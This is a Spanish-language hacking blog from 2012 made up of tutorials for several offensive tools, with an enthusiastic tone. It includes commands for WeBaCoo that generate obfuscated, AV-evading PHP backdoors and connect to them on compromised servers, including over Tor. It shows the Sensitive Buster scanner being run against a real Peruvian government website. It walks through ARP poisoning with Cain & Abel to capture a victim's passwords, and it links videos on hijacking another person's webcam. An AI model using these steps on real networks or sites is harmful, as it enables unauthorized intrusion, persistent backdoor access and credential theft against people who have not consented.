domingo, 30 de septiembre de 2012

Mercury v1.1 - Analisis de vulnerabilidades en Android

 
El mercury es un framework de trabajo gratuito para los cazadores de errores y llegar a encontrar vulnerabilidades.


Esta herramienta nos va a perminitir introducirnos en el mundo del Android y poder un buen rato divertirnos con ella..xDDDD.

Mercury no va a permitir utilizar el análisis dinámico de las aplicaciones de Android y los dispositivos para las evaluaciones de seguridad más rápidas.La nueva versión es compatible con las nuevas versiones de Android Ice Cream Sandwich, incluyendo y Bean Jelly, lo que significa que ahora puede ejecutar Mercury en el hardware más reciente y más grande.

 Esto le permite ser el primero en encontrar y reportar errores previamente no revelados en ese teléfono recientemente lanzado...yeahhhhhhhhhhhh!!!!!


 Caracteristicas de Mercury :

  •     Interactuar con los 4 criterios de valoración de la CIP - Actividades, receptores de   radiodifusión, proveedores de contenidos y servicios
  •     Use una cubierta adecuada que le permite jugar con el sistema operativo subyacente Linux desde el punto de vista de una aplicación sin privilegios (usted se sorprenderá de lo mucho que aún se puede ver)
  •     Encuentre información sobre los paquetes instalados con filtros de búsqueda opcionales que permiten un mejor control
  •     Construido en comandos que se pueden comprobar los vectores de ataque de aplicaciones en las aplicaciones instaladas
  •     Herramientas para cargar y descargar archivos entre el dispositivo y el ordenador Android sin necesidad de utilizar ADB (esto significa que se puede hacer a través de Internet, yeah!!)
  •     Crear nuevos módulos de explotar su último hallazgo en Android, y jugar con los que otros han encontrado.



Para aquellos  interesados ​​en las vulnerabilidades en productos de proveedores, la nueva versión es el comienzo de una colección de éstos framework. La escalada de privilegios fue la primera en ser incluida, lo que permite la escalada a raíz de contexto sin privilegios de Mercurio.  

Un módulo fue creado para buscar vulnerabilidades en los proveedores de contenidos descubierto en los dispositivos Samsung (Galaxy)


Descargar :        Mercury v1.1

Mercuy v1.1 - Backtrack5R3

Primero abrimos una terminal (como siempre)...y digitamos los siguiente...(supongo que han instalado un descomprimidor de archivos)

~# unzip mercury-v.1.1.zip


Yeahhhhhhhhhhhh!!!!!!!!!!!


Esperamos a que termina de extraer los archivos...y cerramos la terminal...=)

Otra vez abrimos una nueva terminal bueno solo si gustamos porque pudimos hacer utilizado la anterior..=)

Nos diponemos a extraer los archivos por parte del server..=)

~# unzip mercury-server.apk


Una vez terminado todo......volvemos a cerrar la terminal y abrir otra ......prometo que sera la última..=)

Ahora vamos a ir en busqueda de la carpeta que hemos extraido...que en este caso lleva el nombre de client...=)

~# cd client
~/client# ls
~/client# python mercury.py


Yeahhhhhhhh!!!!!!!!!!!!!


Ahora vamos a digitar los siguiente...=)

mercury> connect 127.0.0.1


..Nooooooooooooo!!!!!!!....Error...=(

Si consigue como respuesta   **Network Error** Coul not connect to 127.0.0.1:31415  ....... a continuación, asegúrese de que ha hecho lo siguiente:
  • Habilitado el servidor de mercurio.
  • Si tienen acceso a TCP por el puerto 31415 en el servidor Mercury (recordemos que transmita el puerto para devies conectadas localmente y emuladores)
Bueno supongo que usted tiene el nivel para poder arreglar el problema...Y para que tenga mayor conocimiento acerca de Mercury-v1.1 les dejo un pequeño manual hecho por mis amigos de Infosecurity.......=)

Manual :     Mercury-v1.1

Testeando con Mercury...=D


Yeahhhhhhhhh!!!!!!!!!!!!!!!!!
 

Y no puede faltar una Demo de mis amigos de Infosecurity...=)

Demo :       Mercury-v1.1     

Bueno creo que hasta con esto ya es suficiente para poder introducirnos en el mundo de Android...=)...espero que les sea de utilidad este post....Y sin mas que decir me despido y sera hasta la próxima....nos vemos Mundo....xDDDDDDD...






P.D : Agradesco a esa persona que me ayudo en esos momento muy dificiles por los que estaba pasando........Gracias Peque........por esas palabras de apoyo......=D








Pweb-suite V1.1 -  Aplicaciones web basadas en herramientas de pruebas de penetración

Esta herramienta esta escrita completamente en  lenguaje Perl, incluye un conjunto de herramientas básicas para la automatización de pruebas de penetración y detección de vulnerabilidades.  

Esta Suite (anteriormente conocida como la "Suite pCrack") de herramientas se utiliza principalmente o pruebas de aplicaciones web vulnerabilidad.

pWeb-suite contiene diversas herramientas:

  • Hellfire - LFI herramienta de automatización.
  • LogInjector - Herramienta de inyección para los registros del servidor web.
  • Smsi (SimplyMysqli) -  Sencillo Injector mysql.
  • Xss Tools like StrEncode - Herramientas como strendoce.
  • Xss String Encoding Tool. - Herramienta para codificación en cadena.


Descargar :                                       pWeb-suite v1.1





 Ahora encendemos nuestra Backtrack para la instalación...=)

pWeb-suite - Backtrack5R3

Despues de la descarga nos disponemos ha abrir una terminal, y ingresamos lo siguiente..=)

  ~# tar -xvf pWeb_1.2.tar.gz


Una vez que acabe de instalar todos los modulos cerramos la terminal y volvemos abrir una nueva..=)





Como podemos observar , podemos ver los modos de ataque de esta herramienta...=)

LFI         logs        mathematics      misc     online-resources       recon      SQLi       wordlists XSS



Demostraciones :

1.-  Hellfire - LFI herramienta de automatización.

2 .- Xss String Enconding Tool



 

Bueno creo que esto es todo hasta el momento...espero que esta herramienta les sea de utilidad......sin mas que decir me despido y sera hasta la próxima....=D











viernes, 28 de septiembre de 2012

PeerBlock

Es una nueva versión del popular Peerguardian que soluciona varios problemas sin solución que tenía este programa cuyo desarrollo lleva parado por lo menos desde hace dos años. Su funcionamiento es el mismo, PeerBlock bloquea asociaciones, entidades, organizaciones  anti P2P, trackers falsos, trackers maliciosos que propagan spyware, malware, etc.
PeerBlock es compatible con XP, Vista y Windows 7.

Se puede descargar PeerBlock desde su página oficial.  Les recomiendo que entren a la página oficial de Peerblock con Firefox y noscript activado.

 Descargar :         PeerBlock            

Una vez descargado PeerBlock comencemos con la instalación:


 Solo hay que seguir el asistente para instalar PeerBlock


Una vez que tenemos instalado el programa, si tenemos marcado Launch PeerBlock este arrancará (sino basta con arrancarlo desde el icono del escritorio)
Cuando arrancamos Peerblock por primera vez nos aparecerá un asistente de configuración.


Continuamos para configurar PeerBlock


En esta pantalla podremos seleccionar qué queremos que Peerblock bloquee, lo interesante es que bloquee a las organizaciones que están en contra del intercambio de archivos mediante programas P2P. Seleccionamos y seguimos.


Podemos configurar Peerblock para que se actualiza automáticamente. Seleccionamos la frecuencia de la actualización y si queremos actualizar la lista y/o el programa y pulsamos siguiente.


  
Una vez  seguido todo el asistente pulsamos Finalizar y ya hemos configurado algunas de las opciones de PeerBlock. Ahora PeerBLock buscará actualizaciones.


 Una vez debidamente actualizado veremos la pantalla principal de PeerBlock (también se situará en la barra de tareas un icono del programa)



Como véis en la captura las opciones e información no revisten dificultad ( desactivar/activar la protección, buscar actualizaciones, mostrar el administrador de listas, permitir/bloquear HTTP, Ver historial, limpiar el log generado)
Para seguir viendo opciones de PeerBlock pulsamos dentro de esta pantalla principal la pestaña Settings.




Esta pantalla no difiere en la de Peerguardian así que cito textualmente sus opciones de su manual:
  • Log Window : Aquí podremos cambiar el número de líneas del log , mostrar o no las conexiones permitidas y el color del código del log
  • History : En ella se pueden establecer opciones para las conexiones permitidas en el log
  • Notification : Se nos da la opción de notificarnos en caso de que haya HTTP (websites) bloqueados y la manera de avisarnos. Si se elige Blink Tray Icon el icono de PeerGuardian parpadeará cuando se produzca un bloqueo.
Existe otra pantalla de configuración a la que accederemos pulsando Next.



 En esta pantalla podremos configurar si Peerblock arranca con windows, opciones de actualización, ocultar o no la ventana principal, etc.

Bueno saludo a Hugo Gomez por haber apoyado en la fabricación de este post..=)...Creo que ya no tengo mas que decir , y sera hasta la próxima...Nos vemos....=)






Sensitive Buster


El equipo r00tworm ha lanzado una nueva herramienta hace poco tiempo, lleva el nombre de Sensitive Buster.
El código de la herramienta fue hecha por Th3Breacher y Angel Injection. La función de Sensitive Buster es la de encontrar vulnerabilidades en servidores webs, paneles de administración, copias de seguridad
La herramienta esta codificada en el lenguaje python y por suerte es de código abierto, para que cada usuario pueda editarlo para poder optimizarlo.

 Como usar Sensitive Buster.
 
1 .- En primer lugar es necesario instalar python y posteriormente activo.
2 .- Abrimos todos los archivos de nuestra descarga.
3 .- Luego nos disponemos a abrir una ventana del sistema.
4 -. Digitamos  ./sensitivebuster.py 

5 .- Para finalizar digitamos => python sensitivebuster.py  <target> -m  <modo>

 Existen 5 tipos de modo :

-shell
-
backup
-admin

-dir

-files

 
En esta ocación voy a utilizarlo en Backtrack5R3...=)

Sensitive Buster - BackTrack5R3 

Descarga :        Sensitive Buster

Luego de la descarga y la extraccion de los archivos , procedemos con abrir una terminal.


Ahora debemos ingresar nuestro objetivo a analizar...=)

En esta ocasión elegiré a  ===>  http://www.peru.gob.pe

~# python sensitivebuster.py http://www.peru.gob.pe -m files


 Y listooo!!!!!!! va a comenzar la busqueda de files (archivos)........=D


Bueno creo que esto es todo por el momento .....me despido y sera hasta la próxima.....Nos vemos..=D....






martes, 25 de septiembre de 2012

WeBaCoo - Web Backdoor Cookie





WeBaCoo (cookie Web Backdoor) es un backdoor web script-kit, cuyo objetivo es el de proporcionar un terminal de sigilo,como conexión a través de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotación de correos para mantener el acceso a un servidor web comprometida.

Fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, firewalls y servidores de seguridad de aplicaciones, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido.El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.


El guión-kit tiene dos modos de funcionamiento principales: Generación y "Terminal". Usando el modo de generación, el usuario puede crear el código de la  puerta trasera que contiene las cargas útiles de PHP. Por otro lado, en el modo "terminal" el cliente puede conectarse al servidor por donde se ha comprometido el backdoor inyectando código PHP. Con el fin de establecer la conexion remota "pseudo"- shell, el usuario debe proporcionar la ruta de acceso del servidor URL que contiene el código PHP insertado.



 A continuacion vamos a usar el WeBaCoo en Backtrack5R3.

WeBaCoo - Backtrack5R3

 La instalacion creo que no sera ningun problema...=)

~# git clone git://github.com/anestisb/WeBaCoo.git
~# wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
~#./webacoo.pl -h


Deben tener en cuenta que van a existir dos tipos de comandos.

1 .-  Comandos por parte de WeBaCoo.
2 .-  Comandos por parte del servidor. 


Comandos por parte de WeBaCoo


1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:
  • ./webacoo.pl -g -o backdoor.php
2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":
  • ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:
  • ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:
  • ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:
  • ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:
  • ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:
  • ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt  



Comandos por parte del servidor


 1) MySQL-CLI: MySQL Command Line Module:
  • mysql-cli <IP(:port)> <user> <pass>    
2) PSQL-CLI: Postgres Command Line Module:
  • psql-cli <IP(:port)> <db> <user> <pass> 
3) Upload: File Upload Module:
  • upload <local_file> <remote_dir>     
4) Download: File Download Module:
  • download <remote_file>                  
5) Stealth: Enhance Stealth Module
  • stealth <webroot_dir>                
 
Creo que con todos estos comandos ya es suficiente para hacer una pequeña prueba....=)..En esta ocasión voy a utilizar la herramienta Metasploit que ya hemos observado en el post anterior...=)

 Mestasploit  y WeBaCoo en Backtrack5R3




Ahora si creo que ya llegamos al final del post, espero que haya sido entendible y util para ustedes..=)
si tienen alguna duda oh hay algun error en los comandos....No se preocupen los comandos estan en la carpeta WeBaCoo ...=) exactamente el el archivo README....Bueno sin mas que decir me despido y sera hasta la próxima....Nos vemos.....=D





Metasploit Framework
Para comenzar hablar acerca de metasploit, hay que saber que esta herramienta esta escrita en lenguaje Perl y con utilizaciones de diversos Lenguajes de programación como C, Python ,Ruby, ASM ,etc , para el desarrolo , testeo , mejora y penetracion a un sinfin de sistemas , donde tambien por supuesta se encuentra Windows.

La herramienta metasploit se ejecuta bajo una consolo CYGWIN y trabaja con una base de datos en la cual se encuentra almacenado una gran lista de exploit y vulnerabilidades de distintos sistemas, lo unico que hay hacer es indicarle a metasploit que vulnerabilidad vamos a explotar , que exploit nos va ayudar a relizar esa acción , que sistema vamos a atacar y que tipo de ataque utilizaremos y una gama de datos diversos que utilizara para atacar el host elegido.

Se llama metasploit framework  la pregunta es porqué.?....Pues la respuesta es sencilla ..=) ..Es basicamente porque es todo un entorno de testeo para diversas plataformas (Windows,Linux,Mac), la cual trabaja bajo librerias, bases de datos , shellcodes, etc. Por esa razon deja de ser un software si no un framework...=)


Bueno a continuación voy a dar algunos conceptos básicos que necesitas saber acerca de metasploit..=)

Exploit :

Es un codigo escrito con el fin de aprovechar un error en la programación en cualquier nivel, es muy util a la hora de querer acceder a un sistema .

Shell :

Es la parte fundamental de un sistema operativo, y se encarga de ejecutar las ordenes básicas para el manejo del sistema. Suele incorporar caracteristicas tales como control de procesos, redireccion de entrada/salida y un lenguaje de órdenes para escribir programas por lotes o pequeños módulos (scripts).

VNC :

Es un programa de software libre basado en una estructura cliente-servidor, el cual nos permite tomar el control de ordenador-servidor remotamente a traves de un ordenador-cliente.

Conexión inversa :

Es un método de ataque, donde la victima se conecta a un host y puerto especificado para recibir ordenes, comunmente utilizado para saltar firewalls.

 

Ahora vamos a hablar acerca de los 2 tipos de modalidad con las cuales se puede ejecutar metasploit, esto va a depender del gusto y la comodidad del usuario.


Modo Web :(msfweb.bat)

En este tipo de modalidad ,trabajar con metasploit es una manera muy comoda , ya que aqui toda la interfaz es web , y no tienes que escribir mucho codigo. Esta modalidad consiste en seleccionar opción por opción , al igual exploit por exploit, y asi comenzar el ataque. Por otro lado tambien existe en esta misma modalidad el ataque por shell, el cual lo maneja por secciones, para poder entrar a este modo, lo unico que se tiene que hacer es abrir el arvhico msfweb.bat de metasploit, lo cual hara que aparesca algo como el siguiente mensaje :

+-----------=[ Metasploit Framework Web Interface (127.0.0.1 : 55555)

Una vez mostrado el mensaje, solo tienes que ir a cualquier navegador web y entrar con la direccion http://127.0.0.1:55555 , y desde esta pagina realizariamos los ataques con metasploit.

A continuación vamos a nuestro Backtrack5R3 para ver como funciona nuestro Metasploit.

Metasploit - Backtrack5R3

Primero debemos cargar los modulos de metasploit..=)


Elegimos la opcion msfupdate..=D..luego aparecera una terminal , que comenzara a cargar los módulos...=)


Esperamos hasta que termine de cargar todo los módulos...=)


Ahora digitamos :

~# armitage

Si gustan pueden cerrar la terminal anterior y abrir otra terminal....=)


A continuación se mostrara una pequeña interfaz de usuario.... lo unico que hay que hacer es darle en Connect ..=)


Luego aparecera otra ventana...=)...le gamos Yes..



Ahora solo debemos de esperar a que termine de cargar ....=)


Y Listoooooooo!!!!!!!



Si de esta forma no se muestra la interfaz de Armitage....talvez de esta si les funcione.=D

Abrimos una terminal y digitamos :

~# msfgui


Como resultado nos va a salir esta ventana , esperamos que carge todo los módulos y luego nos dirigimos a la pestaña File, elegimos la opción Show connection detals.


Como resultado aparecera esta pequeña ventana con un username y password...=)
Por ultimo abrimos una terminal mas y digitamos :

~# armitage

Ahora en la interfaz que nos va a salir escribimos nuestro username (por defecto no cambia) y el password .....=).... y le damos en Connect.....=D




Y Listoooooooo!!!!!!!



Ahora pasemos a la otra modalidad.....=)

Para esto solo debemos abrir una terminal y digitar :

~# msfconsole


Esperamos que carge.........Y Listoooooooo!!!!!!!



Por ultimo dejare unos videos de mestasploit.....=) ( Si hago imagenes de pantalla seria muy largo el post...)

Episodio 1 : Bug distcc y escalado de privilegios.



Episodio 2 : Ataque DoS a Windows 7

 


Episodio 3 : Penetrar un pc por el puerto 445

 

 Episodio 4 :  Intrusión en Linux  

 

Episodio 5 : Encender una webcam ajena.




Agradesco a todos los que hicieron estos videos....=)


Bueno creo que eso es todo...=)....espero que este pequeño post haya sido de su agrado y les sea útil...=) ...sin mas que decir me despido y sera hasta el mes de Octubre....=) ...Se vienen post mas interesantes....(telecomunicaciones)..xDDDDDDDDDD...Nos Vemos....=D...






lunes, 24 de septiembre de 2012

Sniffing - Cain & Abel

Caín & Abel es una herramienta de multiusos,pero es mas conocido por su eficacia a la hora de recuperación de passwords gratuitos para los sistems operativos de Microsoft.

Esta herramienta permite una fácil recuperación de varias clases de password, escuchando{sniffing} la red, crackeando passwords cifrados con ataques por diccionario y fuerza Bruta, decodificando passwords codificados {scrambled}, revelando cuadros de diálogo del tipo password, revelando passwords en cachés y analizando protocolos de enrutamiento (routing). El código fuente no viene incluido. (winNT/2002/XP)

Caín & Abel ha sido desarrollado con la esperanza de que sea útil para los administradores de red, profesores, consultores de seguridad / profesionales, personal forense, los vendedores de software de seguridad, pruebas de penetración profesional y todos los demás que planea usarlo por razones éticas. 

Sniffing

Se trata de una técnica por la cual se puede "escuchar" todo lo que circula por una red. Esto que en principio es propio de una red interna o Intranet, también se puede dar en la red de redes: Internet.

Creo que ya podemos comenzar con el post verdader..=)

Primero debemos descargarnos la herramienta Caín & Abel.

Sitio oficial :               http://www.oxid.it/cain.html

Ahora procegimos con la  instalacíon



A continuación nos van a pedir permiso si deseamos instalar WinPcap....... aceptamos, ya que nos va ser de mucha utilidad...=)









Una vez que hemos terminado reiniciamos nuestra pc y listooo!!!......=)

Ahora nos disponemos a abrir a Caín , y continuamos con su configuración, para eso abrimos nos dirigimos al Menú Configure, ahí seleccionamos nuestro adaptador de red, y en la pestaña APR(ARP Poison Routing) tenemos opciones de utlizar nuestras direcciones IP y MAC reales, o spoofearlas.



Le damos en aceptar ....=) ....y nos dirigimos al siguiente icono...

 


Listo ya activamos el sniffer....xD..arhora click derecho en Caín y marcamos la siquiente opción..
Scan MAC Addresses ...=)




Con esto buscara direcciones MAC de pc en nuestra red, solo tenemos que esperar un tiempo...=)






Tras haber pasado un buen tiempo , Caín ya habra escaneado toda la Red, asi que seleccionamos las direcciones IP de los objetivos que deseamos sniffear , para eso nos vamos a la pestaña inferior ARP y le damos click sobre el boton + (Add to list).




 Al instante de desplegara una ventana doble , con dos secciones, donde en la de la izquierda seleccionamos el objetivo A de la lista de IP's,esto llenara el lado derecho con otras direcciones IP's, en este lado debemos seleccionar la IP del objetivo B.




Al llenar las tablas con IP's estamos indicanco a Caín como debera envenenar las tablas ARP (Address Resolution Protocol) de las victimas. Tambien hay que tener en cuenta que si estas en una red concentrada (conectada por Hubs), no es necesario envenenar las tablas ARP de nadie, ya que los paquetes llegar solos...xDDDDD ....pero si estas en una red conmutada (Switch), si es necesario envenenar las tablas ARP de la red.

Tras haber hecho todo lo anterior , ahora nos toca envenenar las tablas ARP de nuestra Red (estoy en una red conmutada =(..) asi que si es necesario envenenar las tablas ARP. Para poder lograrlo solo debemos darle click en el boton amarillo APR.




Y listo el ataque ya empezoo..YEAHH!!!!....ahora solo debemos esperar a que nuestra victima ingrese su usuario y su password....xDDDDDDDDDDDD

Para revisar que ya alguien ha pisado el palida le damos click en la opcion Passwords....=D



 =O....=O....=O.....xDDDDDDDDD
Yeahhhhhhhh!!!!!!!!!!!!!!!!!!! como pueden ver ya tenemos su username y el password de una web...xD..

Al parecer  ya logramos nuestro objetivo......ahh por cierto , me olvidaba....xD.....cuando van a cerrar a Caín , primero deben detener el envenenamiento ARP y posteriormente detener el sniffer....=D

Bueno creo que ya llegamos al final del post....espero que les sea de utilidad....=D....sin mas que decir me despido y sera hasta la próxima....Nos Vemos.....=D